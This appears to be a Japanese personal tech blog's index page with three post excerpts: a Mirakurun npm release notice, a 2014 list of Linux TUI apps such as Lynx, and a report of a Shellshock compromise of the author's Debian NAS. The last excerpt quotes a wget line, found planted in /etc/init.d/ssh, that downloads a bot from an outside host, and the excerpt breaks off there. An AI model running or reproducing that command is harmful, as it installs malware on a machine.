Mirakurun をリリースしました。

※ロゴは仮 というわけで Mirakurun (npm) をリリースしました。と言っても npm に最初のバージョンを publish したのは3月中旬頃だったと記憶しているので、今更なお知らせかなって感じです。 そういえばこのブログ上ではまだ一度も Chinachu に関して言及していませんでした。その件については次期リリースの Air をお待ちください。 これは僕の悪い癖ですが、リリース目標とする品質を高く設定しすぎてしまうがあまり、開発が長引き、β版状態ではあまり告知をしない癖があります。 Chinachu はまだβ版ですので、それが理由でその存在を告知したことは同人誌以外ではほぼほぼありません。気が付いたらほぼ口コミのみで様々な方が利用して下さっているようです。 Chinachuが山陽放送の特定の目的で使われてるらしい »

2014年末最新・Linuxで知っておくと便利なTUIアプリ5選

東京も大変寒い日が続いております。皆様お元気でしょうか。 2014年末ということで!毎年恒例、今、特に私の中でアツい、マイトレンドのコーナーです。 今回のテーマはLinuxのTUIです。 TUIという言葉はあまり聞かないかもしれませんが、Linuxを普段触れている方は体験したことがあるかと思います。長い言葉でコンソールアプリケーションとも言います。 ↑GNU nano もその1つです。 さて、早速ですが、私のオススメTUIアプリを紹介します。 1. Lynx Lyncじゃない。これは割と有名です。知らない方はコレ知っといて損はないはずです。なんとウェブブラウザです。 これはかなり便利です。何らかの事象で普段使っているデスクトップマシンやスマートフォンが大破してしまった時にどうしてもウェブにアクセスしなければいけない場合なんか、その辺で稼働しているLinuxサーバーを使えるわけですから、 »

Shellshock

5th Oct 2014 NASがやられた。Debian wheezy amd64。 /etc/init.d/ssh RAID修復メンテナンスの時に再起動したらsshdが立ち上がらなくなっていた。 不審に思って /etc/init.d/ssh を確認。 wget http://stablehost.us/bots/regular.bot -O »